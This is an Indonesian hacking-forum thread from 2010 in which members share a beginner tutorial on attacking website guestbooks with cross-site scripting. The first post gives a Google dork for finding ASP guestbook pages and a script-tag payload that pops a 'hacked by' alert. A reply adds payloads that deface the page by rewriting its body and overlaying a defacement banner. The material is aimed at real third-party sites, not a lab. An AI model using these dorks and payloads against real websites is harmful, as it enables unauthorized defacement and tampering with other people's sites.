[Newbie only] XSS for hajar guestbook

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

[Newbie only] XSS for hajar guestbook

Post by demonbrando » Sun Aug 22, 2010 1:12 am

maaf klo tutor ini repost,klo repost or salah tempat apus or pindahin aja om poni :maaf: :maaf:

tutor ini sama dengan tutor om darkzzz yg tentang deface guestbook tapi ini lebih cupu dari tutor om darkzzz maklum masih newbie... :circle: :circle:

oke langsung ajah mulae,pertama kita cari website yg ada guestbooknya
contoh : buka google terus ketik : allinurl:/guestbook.asp

klo sudah cari web yg kamu mau...
contoh sperti ini : Image

kalo sudah copas script berikut ini :

Code: Select all

<script type="text/javascript">alert('hacked by : DemonBrando a.k.a D.13..')</script>


scriptnya bisa kamu ubah sesuka kamu...

dan hasilnya akan jadi seperti gambar di bawah ini :
Image

selamat mencoba... :rokok:

maklum tutornya masih cupu apabila ada kesalahan mohon pencerahanya yah kk... :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
Top
User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:
Contact Darkzzzz

Re: [Newbie only] XSS for hajar guestbook

Post by Darkzzzz » Sun Aug 22, 2010 1:29 am

verify.asp?
Ane gak ngerti gan, mentok cuma sampe verify.asp nya doank yang ke deface :circle:
Pas di refresh, ya normal lagi :mati:
Harusnya yang ke deface itu halaman untuk membaca buku tamu yang orang-orang submit :putusasa: Betul kagak gan? :cry:

Code: Select all

<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : Darkzzzz<br/>Greetz To : Poni, Wilmar Kidz, Phychole, Paman, XShadow, Abah, Bi4kKob4r, Peniru, Hanjian Family, 3tr3m3b0y, etc<br/>Visit http://xcode.or.id";</script>
atau

Code: Select all

<DIV align=center>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px;  1; LEFT: 1px; BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
<br /><br />
<br>
<center>
<font face="Arial" color="red" size="4"><strong><br><br><br>XSS Defacing
<br>
</center>
<font face="Courier New" color="#FF0000" size="3"><center>Greetz To : 2KA01,XCode,Adelia,Si S (2KA01)</left></font>

<left><font face="arial" size="3" color="#FF0000">
<marquee behavior="alternate" scrolldelay="100" style="width: 90%">Sez L3ve B4 U'r XPunged.!!!!!
</li>
</ul>
</td>
</tr>
</table>
I'm not A Hacker, But I'm A Image
Top
User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Newbie only] XSS for hajar guestbook

Post by demonbrando » Sun Aug 22, 2010 10:24 pm

hehehe ini cuma hajar bagian dari sisi client aja om darkzzz ga di deface om cuma nampilin message box kyk di gambar di atas om darkzzz klo udah di refresh yah toh balik lagi ke awal.... maklum om saya bukan defacer and bikin tutorial masih cupu.... :circle: :circle: :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
Top
inyo^
Posts: 19
Joined: Fri Feb 19, 2010 9:31 pm

Re: [Newbie only] XSS for hajar guestbook

Post by inyo^ » Thu Oct 28, 2010 5:59 pm

wah wah.. heheh
Top
Post Reply

Return to “Web Hacking”